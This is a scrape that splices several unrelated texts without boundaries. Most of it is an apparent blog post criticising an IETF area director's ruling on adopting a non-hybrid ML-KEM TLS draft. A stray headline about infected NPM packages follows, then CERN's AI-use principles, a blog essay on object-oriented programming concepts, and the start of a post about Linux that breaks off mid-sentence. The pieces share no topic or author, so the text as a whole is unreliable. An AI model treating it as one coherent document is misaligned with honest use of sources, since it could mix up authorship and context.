The basic error in the PQ-less-complex claim is that it ignores ECC+PQ already being there.
How the "area director" described the objections.
Opposed argument summary
Most of the arguments against adoption are focused on the fact
that a failsafe is better than no failsafe, irrespective of which
post-quantum algorithm is used,
This is the closest that the "area director" comes to acknowledging the central security argument for ECC+PQ.
Of course, the "area director" spends as little time as possible on security.
Compare this to
my own objection
to adoption,
which started with SIKE as a concrete example of the dangers
and continued with
"SIKE is not an isolated example: https://cr.yp.to/papers.html#qrcsp
shows that 48% of the 69 round-1 submissions to the NIST competition
have been broken by now".
and that the practical costs for hybrids
are negligible.
Hmmm.
By listing this as part of an "opposed argument summary",
is the "area director" suggesting that this was disputed?
When and where was the dispute?
As noted above, I've seen
unquantified NSA/GCHQ fearmongering about costs
,
but that was outside IETF.
If NSA and GCHQ tried the same arguments on a public mailing list
then they'd end up being faced with questions that they can't answer.
It was also argued that having an RFC gives too much
promotion or sense of approval to a not recommended algorithm.
When I wrote my own summary of the
objections
,
I provided a quote and link for each point.
The "area director" doesn't do this.
If the "area director" is accurately presenting an argument that was raised,
why not provide a quote and a link?
Is the "area director" misrepresenting the argument?
Making up a strawman?
The reader can't tell.
I have expanded some of the arguments and my interpretation
of the weight of these below.
This comment about "weight" is revealing.
What we'll see again and again is that the "area director"
is expressing the weight that
he
places on each argument
(within the arguments selected and phrased by the "area director"),
i.e., the extent to which
he
is convinced or not convinced by those arguments.
Given that IESG has power under IETF rules to unilaterally block publications approved by WGs,
it's unsurprising that the "area directors", in their roles as IESG members,
will end up evaluating the merits of WG-approved documents.
But
that isn't what this "area director" was instructed to do here
.
There isn't a WG-approved document at this point.
Instead the "area director" was instructed to evaluate whether the chairs "appropriately"
called "rough consensus" to "adopt" the document.
The "area director" is supposed to be evaluating procedurally what the WG decision-makers did.
Instead the "area director" is putting his thumb on the scale in favor of the document.
Incompetent risk management.
Non-hybrid as "basic flaw"
The argument by some opponents that non-hybrids are a "basic flaw" seems
to miscategorize what a "basic flaw" is. There is currently no known
"basic flaw" against MLKEM.
I think that the "area director" is trying to make some sort of claim here
about ML-KEM not having been attacked,
but the wording is so unclear as to be unevaluatable.
Why doesn't
KyberSlash
count?
How about
Clangover
?
How about the continuing advances in lattice attacks
that have already reduced ML-KEM below its claimed security targets,
the most recent news being from
last month
?
More importantly,
claiming that ML-KEM isn't "known" to have problems
is utterly failing to address the point of the ECC seatbelt.
It's like saying
"This car hasn't crashed, so the absence of seatbelts isn't a basic flaw".
As was raised, it is rather odd to be
arguing we must immediately move to use post-quantum algorithms while
at the same time argue these might contain fundamental basic flaws.
Here the "area director" is reasonably capturing
a statement from one document proponent
(original wording:
"I find it
to be cognitive dissonance to simultaneously argue that the quantum threat requires immediate work, and
yet we are also somehow uncertain of if the algorithms are totally broken. Both cannot be true at the same time").
But I promptly
followed up
explaining the error:
"Rolling out PQ is trying to reduce the damage from an attacker having a
quantum computer within the security lifetime of the user data. Doing
that as ECC+PQ instead of just PQ is trying to reduce the damage in case
the PQ part is broken. These actions are compatible, so how exactly do
you believe they're contradictory?"
There was, of course, no reply at the time.
The "area director" now simply repeats the erroneous argument.
As TLS (or IETF) is not phasing out all non-hybrid classics,
"Non-hybrid classics" is weird terminology.
Sometimes pre-quantum algorithms (ECC, RSA, etc.) are called "classical",
so I guess the claim here is that using just ECC in TLS isn't being phased out.
That's a bizarre claim.
There are intensive efforts to roll out ECC+PQ in TLS
to try to protect against quantum computers.
Cloudflare
reports
the usage of post-quantum cryptography having risen to about 50% of all browsers that it sees
(compared to 20% a year ago);
within those connections,
95%
use ECC+MLKEM768 and 5% use ECC+Kyber768.
The "area director" also gives no explanation of
why the "not phasing out" claim is supposed to be relevant here.
I find
this argument not strong enough
See how the "area director" is saying the weight that the "area director" places on each argument
(within the arguments selected and phrased by the "area director"),
rather than evaluating whether there was consensus to adopt the document?
to override the consensus of allowing
non-hybrid standards from being defined
Circular argument.
There wasn't consensus to adopt the document in the first place.
especially in light of the
strong consensus for marking these as "not recommended".
I think many readers will be baffled by this comment.
If something is "not recommended",
wouldn't that be an argument
against
standardizing it,
rather than an argument
for
standardizing it?
The answer is that "not recommended" doesn't mean what you think it means:
the "area director" is resorting to confusing jargon.
I don't think there's any point getting into the weeds on this.
Incompetent planning for the future.
Non-hybrids are a future end goal
Additionally, since if/when we do end up in an era with a CRQC, we are
ultimately designing for a world where the classic components offer less
to no value.
If someone is trying to argue for removing ECC,
there's a big difference between the plausible scenario of ECC having "less" value
and the extreme scenario of ECC having "no" value.
It's wrong for the "area director" to be conflating these possibilities.
As I put it
almost two years ago
:
"Concretely, think about a demo showing that spending a billion dollars on quantum computation can break a thousand X25519 keys.
Yikes! We should be aiming for much higher security than that!
We don't even want a billion-dollar attack to be able to break
one
key!
Users who care about the security of their data will be happy that we deployed post-quantum cryptography.
But are the users going to say 'Let's turn off X25519 and make each session a million dollars cheaper to attack'?
I'm skeptical.
I think users will need to see much cheaper attacks before agreeing that X25519 has negligible security value."
Furthermore,
let's think for a moment about the idea
that one will eventually want to transition to
just ML-KEM
,
the specific proposal that the "area director" is portraying as the future.
Here are three ways that this can easily be wrong:
Maybe ML-KEM's implementation issues
end up convincing the community to shift to a more robust option,
analogously to what happened with
ECC
.
Maybe the advances in public attacks continue to the point of breaking ML-KEM outright.
Maybe the cliff stops crumbling and ML-KEM survives,
but more efficient options also survive.
At this point there are quite a few options more efficient than ML-KEM.
(Random example:
SMAUG
.
The current SMAUG software isn't as fast as the ML-KEM software,
but this is outweighed by SMAUG using less network traffic than ML-KEM.)
Probably some options will be broken,
but ML-KEM would have to be remarkably lucky to end up as the most efficient remaining option.
Does this "area director" think that all of the more efficient options are going to be broken, while ML-KEM won't?
Sounds absurdly overconfident.
More likely is that the "area director" doesn't even realize that there are more efficient options.
For anyone thinking "presumably those newer options have received less scrutiny than ML-KEM":
we're talking about what to do long-term, remember?
Taking ML-KEM as the PQ component of ECC+PQ is working for getting something rolled out now.
Hopefully ML-KEM will turn out to not be a security disaster (or a patent disaster).
But, for guessing what will be best to do in 5 or 10 or 15 years,
picking ML-KEM is premature.
When and where to exactly draw the line of still using a
classic
component safeguard is speculation at best.
Here the "area director" is
clearly
attacking a strawman.
Already supporting pure post
quantum algorithms now to gain experience
How is rolling out PQ supposed to be gaining experience
that isn't gained from the current rollout of ECC+PQ?
Also, I think it's important to call out the word "pure" here
as incoherent, indefensible marketing.
What we're actually talking about isn't modifying ML-KEM in any way;
it's simply hashing the ML-KEM session key together with other inputs.
Is ML-KEM no longer "pure" when it's plugged into TLS,
which also hashes session keys?
(The word "pure" also showed up in a few of the earlier quotes.)
while not recommending it at this
time seems a valid strategy for the future, allowing people and
organizations
their own timeline of deciding when/if to go from hybrid to pure PQ.
Here we again see
the area director making a decision to support the document
,
rather than evaluating whether there was consensus in the WG to adopt the document.
Again getting the complexity evaluation backwards.
Added complexity of hybrids
There was some discussion on whether or not hybrids add more complexity, and
thus add risk, compared to non-hybrids. While arguments were made that
proper
classic algorithms add only a trivial amount of extra resources, it was also
pointed out that there is a cost of implementation, deployment and
maintenance.
Here the "area director" is again
making the same mistake explained earlier:
ignoring the fact that ECC+PQ is already there,
and thus getting the complexity evaluation backwards.
The "thus add risk" logic is also wrong.
Again, all of these options are more complex than the null cipher.
Additionally, the existence of draft-ietf-tls-hybrid-design and the
extensive
discussions around "chempat" vs "xwing" vs "kitchensink" shows that there is
at least some complexity that is added by the hybrid solutions.
No, the details of how to combine ECC with PQ in TLS are already settled and deployed.
Looking beyond TLS:
Chempat hashes the transcript (similarly to TLS),
making it robust for a wide range of protocols.
The other options add fragility by hashing less for the sake of minor cost savings.
Each of these options is under 10 lines of code.
The "area director" exaggerates the complexity by mentioning "extensive discussions",
and spends much more effort hyping this complexity as a risk
than acknowledging the risks of further PQ attacks.
Anyway,
it's not as if the presence of this document
has eliminated the discussions of ECC+PQ details,
nor is there any credible mechanism by which it could do so.
Again, the actual choice at hand is whether to have PQ as an option
alongside
ECC+PQ.
Adding that option
adds
complexity.
The "area director" is getting the complexity comparison backwards
by instead comparing
(1) PQ in isolation to (2) ECC+PQ in isolation.
Botching the evaluation of human factors.
RFCs being interpreted as IETF recommendation
It seems there is disagreement about whether the existence of an RFC
itself qualifies as the IETF defacto "recommending" this in the view
of IETF outsiders/ implemeners whom do not take into account
any IANA registry RECOMMENDED setting or the Mandatory-To-Implement
(MTI) reommendations.
I would expect a purchasing manager to have instructions
along the lines of "Buy only products complying with the standards",
and to never see IETF's confusing jumble of further designations.
This is an area where we recently found out there
is little consensus on an IETF wide crypto policy statement via an
RFC. The decision on whether an RFC adds value to a Code Point should
therefor be taken independently of any such notion of how outsiders might
interpret the existence of an RFC.
From a security perspective,
it's a big mistake to ignore the human factor,
such as the impact of a purchasing manager saying
"This is the most efficient standard so I'll pick that".
In this case, while Section 3 could be
considered informative, I believe Section 4 and Section 5 are useful
(normative)
content that assists implementers.
Is this supposed to have something to do with the consensus question?
And people have proposed extending the
Security Considerations to more clearly state that this algorithm is not
recommended at this point in time. Without an RFC, these recommendations
cannot be published by the IETF in a way that implementers would be known
to consume.
Ah, yes, "known to consume"!
There was, um,
one of those, uh, studies showing the details of, um, how implementors use RFCs,
which, uh, showed that 100% of the implementors diligently consumed the warnings in the RFCs.
Yeah, that's the ticket.
I'm sure the URL for this study is sitting around here somewhere.
Let's get back to the real world.
Even if an implementor does see a "This document is a bad idea" warning,
this simply doesn't matter
when the implementors are chasing contracts issued by purchasing managers
who simply care what's standardized and haven't seen the warning.
It's much smarter for the document to
(1) eliminate making the proposal that it's warning about
and (2) focus, starting in the title, on saying why such proposals are bad.
This makes people
more
likely to see the warning,
and at the same time it removes the core problem of the bad proposal being standardized.
Fictions regarding country actions.
Say no to Nation State algorithms
The history and birth of MLKEM from Kyber through a competition of the
international Cryptographic Community, organized through US NIST can
hardly be called or compared to unilateral dictated nation state algorithm
selection.
Certainly there were competition-like aspects to the process.
I tend to refer to it as a competition.
But in the end the selection of algorithms to standardize was made by NIST,
with
input behind the scenes from NSA
.
There has been no other comparable public effort to gather
cryptographers and publicly discuss post-quantum crypto candidates in a
multi-years effort.
Nonsense.
The premier multi-year effort by cryptographers to "publicly discuss post-quantum crypto candidates"
is the cryptographic literature.
In fact, other nation states are heavily relying on the
results produced by this competition.
Here's the objection from
Stephen Farrell
that the "area director" isn't quoting or linking to:
"I don't see what criteria we might use in adopting this that
wouldn't leave the WG open to accusations of favouritism if
we don't adopt other pure PQ national standards that will
certainly arise".
After reading this objection,
you can see how the "area director" is sort of responding to it
by suggesting that everybody is following NIST
(i.e., that the "certainly arise" part is wrong).
But that's not true.
NIST's selections are controversial.
For example, ISO is
considering
not just ML-KEM but also
Classic McEliece,
where NIST has
said
it's waiting for ISO
("After the ISO standardization process has been completed, NIST may consider developing a standard for Classic McEliece based on the ISO standard"),
and
FrodoKEM,
which NIST
said
"will not be considered further for standardization".
ISO is also now
considering
NTRU, where the
advertisement
includes "All patents related to NTRU have expired"
(very different from the ML-KEM situation).
BSI, which sets cryptographic standards for Germany,
recommends
not just ML-KEM
but also FrodoKEM (which it describes as "more conservative" than ML-KEM)
and Classic McEliece ("conservative and very thoroughly analysed").
Meanwhile China has called for
submissions
of new post-quantum proposals for standardization.
I could keep going,
but this is enough evidence to show that Farrell's prediction was correct;
the "area director" is once again wrong.
The use of MLKEM in the IETF will
not set a precedent for having to accept other nation state cryptography.
Notice how the "area director" is dodging Farrell's point.
If NSA can pressure the TLS WG into standardizing non-hybrid ML-KEM,
why can't China pressure the TLS WG into standardizing something China wants?
What criteria will IETF use to answer this question
without leaving the WG "open to accusations of favouritism"?
If you want people to believe that it isn't about the money
then you need a
really
convincing alternative story.
Denouement.
Not recommending pure PQ right now
There was a strong consensus that pure PQ should not be recommended at
this time, which is reflected in the document. There was some discussion
on RECOMMENDED N vs D, which is something that can be discussed in the
WG during the document's lifecycle before WGLC. It was further argued
that adopting and publishing this document gives the WG control over
the accompanying warning text, such as Security Considerations, that
can reflect the current consensus of not recommending pure MLKEM over
hybrid at publication time.
This is just rehashing earlier text,
even if the detailed wording is a bit different.
Conclusion
The pure MLKEM code points exist.
Irrelevant.
The question is whether they're being standardized.
An international market segment that
wants to use pure MLKEM exists
along with existing implementations of the draft on mainstream
devices and software.
Yes, NSA waving around money has convinced some corporations to provide software.
How is this supposed to justify the claim
that "there was rough consensus to adopt the document"?
There is a rough consensus to adopt the document
Repeating a claim doesn't make it true.
with a strong consensus for RECOMMENDED N and not MTI, which is
reflected in the draft.
Irrelevant.
What matters is whether the document is standardized.
The reasons to not publish MLKEM as an RFC seem
more based on personal opinions of risk and trust not shared amongst all
participants as facts.
This sort of dismissal might be more convincing
if it were coming from someone providing more URLs and fewer easily debunked claims.
But it's in any case not addressing the consensus question.
Based on the above, I believe the WG Chairs made the correct call that
there was rough consensus for adopting
draft-connolly-tls-mlkem-key-agreement
The chairs claimed that "we have consensus to adopt this draft"
(based on claiming that "there were enough people willing to review the draft",
never mind the number of objections).
That claim is wrong.
The call for adoption failed to reach consensus.
The "area director" claimed that
"There is clearly consensus
based on the 67 responses to the adoption call. ...
The vast majority was in favour of adoption ...
There were a few dissenting opinions".
These statements still haven't been retracted;
they were and are outright lies about what happened.
Again, the
actual tallies
were
20 people unequivocally supporting adoption,
2 people conditionally supporting adoption,
and 7 people unequivocally opposing adoption.
Without admitting error,
the "area director" has retreated to a claim of "rough consensus".
The mishmash of ad-hoc comments from the "area director"
certainly doesn't demonstrate any coherent meaning of "rough consensus".
It's fascinating that IETF's
advertising to the public
claims that IETF's "decision-making requires achieving broad consensus",
but IETF's
WG procedures
allow controversial documents to be pushed through on the basis of "rough consensus".
To be clear,
that's only if the "area director" approves of the documents,
as you can see from the same "area director"
issuing yet another mishmash of ad-hoc comments to
overturn
a separate chair decision in September 2025.
You would think that the WG procedures would
define
"rough consensus".
They don't.
All they say is that
"51% of the working group does not qualify as 'rough consensus' and 99% is better than rough",
not even making clear whether 51% of
voters
within a larger working group can qualify.
This leaves a vast range of ambiguous intermediate cases up to the people in power.
Version:
This is version 2025.11.23 of the 20251123-dodging.html web page.
Shai-Hulud Returns: Over 300 NPM Packages Infected
Artificial intelligence (AI) can be found at CERN in many contexts: embedded in devices, software products and cloud services procured by CERN, brought on-site by individuals or developed in-house.
Following the
approval of a CERN-wide AI strategy
, these general principles are designed to promote the responsible and ethical use, development and deployment (collectively “use”) of AI at CERN.
They are technology neutral and apply to all AI technologies as they become available.
The principles apply across all areas of CERN’s activities, including:
AI for scientific and technical research
: data analysis, anomaly detection, simulation, predictive maintenance and optimisation of accelerator performance or detector operations, and
AI for productivity and administrative use
: document drafting, note taking, automated translation, language correction and enhancement, coding assistants, and workflow automation.
General Principles
CERN, members of its personnel, and anyone using CERN computing facilities shall ensure that AI is used in accordance with the following principles:
Transparency and explainability
: Document and communicate when and how AI is used, and how AI contributes to specific tasks or decisions.
Responsibility and accountability
: The use of AI, including its impact and resulting outputs throughout its lifecycle, must not displace ultimate human responsibility and accountability.
Lawfulness and conduct
: The use of AI must be lawful, compliant with CERN’s internal legal framework and respect third-party rights and CERN’s Code of Conduct.
Fairness, non-discrimination, and “do no harm”
: AI must be used in a way that promotes fairness and inclusiveness and prevents bias, discrimination and any other form of harm.
Security and safety
: AI must be adequately protected to reduce the likelihood and impact of cybersecurity incidents. AI must be used in a way that is safe, respects confidentiality, integrity and availability requirements, and prevents negative outcomes.
Sustainability
: The use of AI must be assessed with the goal of mitigating environmental and social risks and enhancing CERN's positive impact in relation to society and the environment.
Human oversight
: The use of AI must always remain under human control. Its functioning and outputs must be consistently and critically assessed and validated by a human.
Data privacy
: AI must be used in a manner that respects privacy and the protection of personal data.
Non-military purposes
: Any use of AI at CERN must be for non-military purposes only.
A one-page summary of the main themes of the CERN AI strategy (click the image to see a larger version)
OOP-bashing seems fashionable nowadays. I decided to write this article after seeing two OOP-related articles on
Lobsters
in quick succession. I’m not interested in defending or attacking OOP, but I do want to throw in my two cents and offer a more nuanced view.
The industry and the academy have used the term “object-oriented” to mean so many different things. One thing that makes conversations around OOP so unproductive is the lack of consensus on what OOP is.
What is Object-Oriented Programming?
Wikipedia defines it
as “a programming paradigm based on the concept of objects.” This definition is unsatisfactory, as it requires a definition of an “object” and fails to encompass the disparate ways the term is used in the industry. There is also
Alan Kay’s vision of OOP
. However, the way most people use the term has drifted apart, and I don’t want to fall into
essentialism
or
etymological fallacy
by insisting on a “true” meaning.
Instead, I think it is better to treat OOP as a mixed bag of interrelated ideas and examine them individually. Below, I will survey some ideas related to OOP and mention their pros and cons (in my subjective mind).
Classes
Object-oriented programming is a method of implementation in which programs are organized as cooperative collections of objects, each of which represents an instance of some class, and whose classes are all members of a hierarchy of classes united via inheritance relationships. — Grady Booch
Classes extend the idea of a “struct” or “record” with support for the method syntax, information hiding, and inheritance. We will talk about those specific features later.
Classes can also be viewed as blueprints for objects. It is not the only way to do that, and
prototypes
is an alternative pioneered by
Self
and, most famously, used by JavaScript. Personally, I feel that prototypes are harder to wrap one’s head around compared to classes. Even JavaScript tries to hide its usage of prototypes from newcomers with ES6 classes.
Method Syntax
In Japanese, we have sentence chaining, which is similar to method chaining in Ruby —
Yukihiro Matsumoto
The method syntax is one of the less controversial OOP features. It captures common programming use cases involving operations on a specific subject. Even in languages without methods, it is common to see functions effectively serve as methods by taking the relevant data as their first argument (or last, in languages with currying).
The syntax involves method definitions and method calls. Usually, languages supporting methods have both, unless you consider the “pipe operators” in functional languages as a form of method call.
The method call syntax aids IDE autocompletion, and method chaining is often more ergonomic than nested function calls (similar to the pipe operator in functional languages).
There are some debatable aspects of the method syntax, too. First, in many languages, methods are often not definable outside of a class, which causes a power imbalance compared to functions. There are certain exceptions, such as Rust (methods are always defined outside of the struct), Scala, Kotlin, and C# (extension methods).
Second, in many languages,
this
or
self
is implicit. This keeps the code more concise, but it can also introduce confusion and increase the risk of accidental name shadowing. Another drawback of an implicit this is that it is always passed as a pointer, and its type cannot be changed. This means you cannot pass it as a copy, and sometimes this indirection leads to performance issues. More importantly, because the type of this is fixed, you cannot write generic functions that accept different
this
types. Python and Rust got
this
right from the start, and C++ just fixed this issue in C++23 with
deducing this
.
Fourth, the dot notation is used for both instance variable accesses and method calls in most languages. This is an intentional choice to make methods look more
uniform
with objects. In certain dynamically typed languages where
methods are instance variables
, this is fine and pretty much not even a choice. On the other hand, in languages like C++ or Java, this can cause confusion and shadowing problems.
Information Hiding
Its interface or definition was chosen to reveal as little as possible about its inner workings —
[Parnas, 1972b]
In Smalltalk, all instance variables are not directly accessible from outside the object, and all methods are exposed. More modern OOP languages support information hiding via access specifiers like
private
at the class level. Even non-OOP languages usually support information hiding in some way, be it module systems, opaque types, or even C’s header separation.
Information hiding is a good way to prevent
invariant
from being violated. It is also a good way to separate frequently changed implementation details from a stable interface.
Nevertheless, aggressively hiding information may cause unnecessary boilerplate or
abstraction inversion
. Another criticism comes from functional programmers, who argue that you don’t need to maintain invariants and thus don’t need much information hiding if data is
immutable
. And, in a sense, OOP encourages people to write mutable objects that must be maintained as invariants.
Information hiding also encourages people to create small, self-contained objects that “know how to handle themselves,” which leads directly into the topic of encapsulation.
Encapsulation
If you can, just move all of that behavior into the class it helps. After all, OOP is about letting objects take care of themselves. — Bob Nystrom,
Game Programming Patterns
Encapsulation is often confused with information hiding, but the two are distinct. Encapsulation refers to bundling data with the functions that operate on it. OOP languages directly support encapsulation with classes and the method syntax, but there are other approaches (e.g.,
the module system in OCaml
).
Data-oriented design
has a lot to say about bundling data and functionality. When many objects exist, it is often much more efficient to process them in batches rather than individually. Having small objects with distinct behaviors can lead to poor data locality, more indirection, and fewer opportunities for parallelism. Of course, advocates of data-oriented design don’t reject encapsulation outright, but they encourage a more coarse-grained form of it,
organized around how the code is actually used rather than how the domain model is conceptually structured
.
Separation of interface and implementation is an old idea closely related to information hiding, encapsulation, and
abstract data type
. In some sense, even C’s header files can be considered an interface, but OOP usage of “interface” most often refers to a specific set of language constructs that support polymorphism (typically implemented via inheritance). Usually, an interface can’t contain data, and in more restricted languages (e.g., early versions of Java), they can’t contain method implementations either. The same idea of an interface is also common in non-OOP languages: Haskell type classes, Rust traits, and Go interfaces all serve the role of specifying an abstract set of operations independent of implementations.
Interface is often considered a simpler, more disciplined alternative to full-blown class inheritance. It is a single-purpose feature and doesn’t suffer from the same diamond problem that plagues multiple inheritance.
Interface is also extremely useful in combination with
parametric polymorphism
, since it allows you to constrain the operations a type parameter must support. Dynamically-typed languages (and C++/D template) achieve something similar through
duck-typing
, but even languages with duck-typing introduce interface constructs later to express constraints more explicitly (e.g., C++ concepts or TypeScript interfaces).
The interface as implemented in OOP languages often has a runtime cost, but that’s not always the case. For example,
C++ concepts
is an example that only supports compile-time, and Rust’s trait only has opt-in runtime polymorphism support via
dyn
.
Late Binding
OOP to me means only messaging, local retention and protection and hiding of state-process, and extreme late-binding of all things —
Alan Kay
Late binding refers to delaying the lookup of a method or a member until runtime. It is the default of most dynamic-typed languages, where method calls are often implemented as a hash table lookup, but can also be achieved with other means, such as dynamic loading or function pointers.
A key aspect of late binding is that behaviour can be changed while the software is still running, enabling all kinds of hot-reloading and monkey-patching workflows.
The downside of late binding is its non-trivial performance cost. Moreover, it can also be a footgun for breaking invariants or even interface mismatches. Its mutable nature can also introduce subtler issues, for example, the “late binding closures” pitfall in Python.
A concept related to late binding is dynamic dispatch, in which the implementation of a polymorphic operation is selected at runtime. The two concepts overlap, though dynamic dispatch focuses more on selecting multiple known polymorphic operations rather than on name lookup.
In a dynamically typed language, dynamic dispatch is the default since everything is late-bound. In statically typed languages, it is usually implemented as a virtual function table that looks something like this under the hood:
structVTable {
// function pointer to destroy the base
void (*destroy)(Base&);
// function pointer to one method implementation
void (*foo)();
// function pointer to another method implementation
int (*bar)(int);
};
structBaseClass {
VTable* vtable;
};
These languages also provide compile-time guarantees that the vtable contains valid operations for the type.
Dynamic dispatch can be decoupled from inheritance, whether by manually implementing a v-table (e.g., C++‘s “type-erased types” such as
std::function
) or an interface/trait/typeclass kind of constructs. When not paired with inheritance, dynamic dispatch alone is usually not considered “OOP.”
Another thing to note is that the pointer to the v-table can be directly inside the object (e.g., C++) or embedded in “fat pointers” (e.g., Go and Rust).
programming using class hierarchies and virtual functions to allow manipulation of objects of a variety of types through well-defined interfaces and to allow a program to be extended incrementally through derivation —
Bjarne Stroustrup
Inheritance has a long history, way backed to
Simula 67
. It is probably the most iconic feature of OOP. Almost every language marketed as “object-oriented” includes it, while languages that avoid OOP typically omit it.
It can be damn
convenient
. In many cases, using an alternative approach will result in significantly more boilerplate.
On the other hand, inheritance is a very
non-orthogonal
feature. It is a single mechanism that enables dynamic dispatch, subtyping polymorphism, interface/implementation segregation, and code reuse. It is flexible, though that flexibility makes it easy to misuse. For that reason, some languages nowadays replace it with more restrictive alternative constructs.
There are some other problems with inheritance. First, using inheritance almost certainly means you are paying the performance cost of dynamic dispatch and heap allocation. In some languages, such as C++, you can use inheritance without dynamic dispatch and heap allocation, and there are some valid use cases (e.g., code reuse with
CRTP
), but the majority of uses of inheritance are for runtime polymorphism (and thus rely on dynamic dispatch).
Second, inheritance implements subtyping in an unsound way, requiring programmers to manually enforce the
Liskov substitution principle
.
Finally, inheritance hierarchies are rigid. They suffer from issues like the diagonal problem, and that inflexibility is one of the main reasons people prefer composition over inheritance. The
component pattern chapter of Game Programming Patterns
provides a good example.
Subtyping Polymorphism
If for each object
of type
there is another object
of type
such that for all programs
defined in terms of
, the behavior of
is unchanged when
is substituted for
, then
is a subtype of
. — Barbara Liskov, “
Data Abstraction and Hierarchy
”
Subtyping describes an “is a” relation between two types. The
Liskov substitution principle
defines the property that safe subtyping relationships must uphold.
OOP languages often support subtyping via inheritance, but note that inheritance doesn’t always model subtyping, and it is not the only form of subtyping either. Various interface/trait constructs in non-OOP languages often support subtyping. And besides
nominal subtyping
, where one explicitly declares the subtyping relationship, there are also
structural subtyping
, where the subtyping is implicit if one type contains all the features of another type. Good examples of structural subtyping include OCaml (
objects
and polymorphic variants) and TypeScript interfaces. Subtyping also shows in all kinds of little places, such as Rust lifetime and TypeScript’s coercion from a non-nullable type to its nullable counterpart.
A related concept to subtyping is
variance
(not related to class-invariant), which bridges parametric polymorphism and subtyping. I won’t bother explaining variance here, as this topic probably needs an entire blog post to explain well. It is a great ergonomic boost (e.g., C++ pointers will be unusable for polymorphic use if it is not covariant), but most languages only implement a limited, hard-coded version, because it is hard to understand and also error-prone. In particular, mutable data types usually should be invariant, and Java/C#‘s covariant arrays are a primary example on this got wrong. There are a few languages that support programmers explicitly control variance, including
Scala
and
Kotlin
.
Type conversion via subtyping relationships is often implicit. Implicit conversion has a bad reputation. Though doing it with subtyping is ergonomic, and is probably the least surprising kind of implicit conversion. Another way to view subtyping is as the dual of implicit conversions. We can “fake” a subtyping relation with implicit conversion. For example, C++ templated types are invariant, but
std::unique_ptr
achieves covariance with an implicit conversion from
std::unique_ptr<Derived>
to
std::unique_ptr<Base>
.
Does Go Have Subtyping?
is a good article to further explore this idea.
One reason that language designers often try to avoid subtyping is the implementation complexity. Integrating bidirectional type inference and subtyping is notoriously difficult. Stephen Dolan’s 2016 thesis
Algebraic Subtyping
makes good progress addressing this issue.
Message Passing
I thought of objects being like biological cells and/or individual computers on a network, only able to communicate with messages —
Alan Kay
Message passing means using objects that send each other “messages” as a way of execution. It is the centric theme of Alan Kay’s vision of OOP, though the definition can be pretty vague. An important point is that message names are late-bound, and the structures of these messages are not necessarily fixed at compile time.
Many early object-oriented concepts were influenced by distributed and simulation systems, where message passing is natural. However, in the era where most people work on single-threaded code, the message was gradually forgotten in languages such as C++ and Java. The method syntax only has limited benefit compared to the original message-passing idea (Bjarne Stroustrup was definitely aware of the idea from Simula, but there is practical constraint on how to make it fast). There was still some genuine message passing, but only in specific areas such as inter-process communication or highly event-driven systems.
Message passing gains a Renaissance in concurrent programming, ironically through non-OOP languages like Erlang and Golang, with constructs such as actors and channels. This kind of
shared-nothing concurrency
removed a whole range of data race and race condition bugs. In combination with supervision, actors also provide fault tolerance, so that the failure of one actor will not affect the entire program.
Open-recursion
Originating in the famous
Types and Programming Languages
,
open recursion
is probably the least well-known and understood term in this blog post. Nevertheless, it just describes a familiar property of object-oriented systems: methods for an object can call each other, even if they are defined in different classes in the inheritance hierarchy.
The term is somewhat misleading, as there may not be recursive function calls, but here “recursion” means “mutually recursive.” The word “open” refers to “open to extension,” typically empowered by inheritance.
It’s easiest to see with an example:
structAnimal {
voidprint_name() const {
// Note that we call `name` here, although it is not defined in Animal
std::print("{}\n", name());
}
virtualstd::stringname() const=0;
};
structCat: Animal {
std::stringname() constoverride {
return"Kitty";
}
};
intmain() {
Cat cat;
// note we call print_name here, although it is not defined in Cat
cat.print_name();
}
For anyone with some familiarity with OOP, we probably take open recursion for granted, even though we may not be aware of its name. But not all language constructs have this property. For example, in many languages, functions are not mutually recursive by default:
// This won't compile in C++ because `name` is not defined
voidprint_name(constAnimal&animal) {
returnname(animal);
}
std::stringname(constCat&cat) {
return"Kitty";
}
Now, in languages with late-bound functions, functions in the same module can always call each other (e.g., Python, JavaScript). There are other languages where functions are mutually recursive by default (e.g., Rust), or have forward declarations (C) or a
letrec
construct (Scheme and ML family) to make functions mutually recursive. This solves the “recursion” part, but still not the “open” part yet:
std::stringname(constCat&cat);
voidprint_name(constAnimal&animal) {
// This still won't compile because we can't downcast an Animal to a Cat
returnname(animal);
}
std::stringname(constCat&cat) {
return"Kitty";
}
Let’s fix this problem by using a callback:
structAnimal {
std::function<std::string()> get_name;
voidprint_name() const {
std::print("{}\n", get_name());
}
};
Animalmake_cat() {
return Animal {
.get_name = []() { return"Kitty"; },
};
}
intmain() {
Animal cat =make_cat();
cat.print_name();
}
Tada, we just reinvented prototype-style dispatch!
Anyway, with my quick example above, I want to show that open recursion is a property that OOP gives for free, but reproducing it in languages without built-in support can be tricky. Open recursion allows interdependent parts of an object to be defined separately, and this property is used in many instances, for example, the entire idea of
decorator pattern
depends on open recursion.
OOP Best Practices
Perhaps the more common complaints about OOP are not about specific language features, but rather about the programming styles it encourages. Many practices are taught as universal best practices, sometimes with rationales, but their downsides are often omitted. Some examples popped into my mind are
Practice
Advantages
Disadvantage
preferring polymorphism over tagged union/if/switch/pattern matching
Open to extension, easier to add new cases.
Performance hit; Related behaviors get scattered in multiple places; harder to see the whole controll flow in one place
making all data members private
Protect class invariants
More boilerplates; Often unnecessary to hide data without invariants; Getter/setter pairs work less well compared to direct access in languages without property syntax
preferring small “self-managed” objects over central “managers”
Harder to violate invariants, cleaner code organization
Potential bad data locality, missing parallelism opportunities, and duplicated references to common data (“back pointer”)
Prevent new features from breaking the old one. Prevent API break
No reason to “close” a non-public module where you own its usage. Leads to unnecessary complexity and inheritance chain; poorly designed interfaces are not changed; Can cause abstraction inversion
preferring abstraction over concrete implementations
Making more system swappable and testable
Overuse sacrifices readability and debuggability. Performance cost of extra indirection
This blog post is long enough, so I will not go into more details. Feel free to disagree with my “advantages and disadvantages”. What I want to convey is that almost all those practices come with trade-offs.
In the End
Congratulations on making it to the end of this article! There are other topics I’d love to discuss, such as
RAII
and design patterns. However, this article is long enough, so I will leave those for you to explore on your own.
I know, this title might come as a surprise to many. Or perhaps, for those who truly know me, it won’t. I am not a fanboy. The BSDs and the illumos distributions generally follow an approach to design and development that aligns more closely with the way I think, not to mention the wonderful communities around them, but that does not mean I do not use and appreciate other solutions. I usually publish articles about how much I love the BSDs or illumos distributions, but today I want to talk about Linux (or, better, GNU/Linux) and why, despite everything, it still holds a place in my heart. This will be the first in a series of articles where I’ll discuss other operating systems.
Where It All Began
I started right here
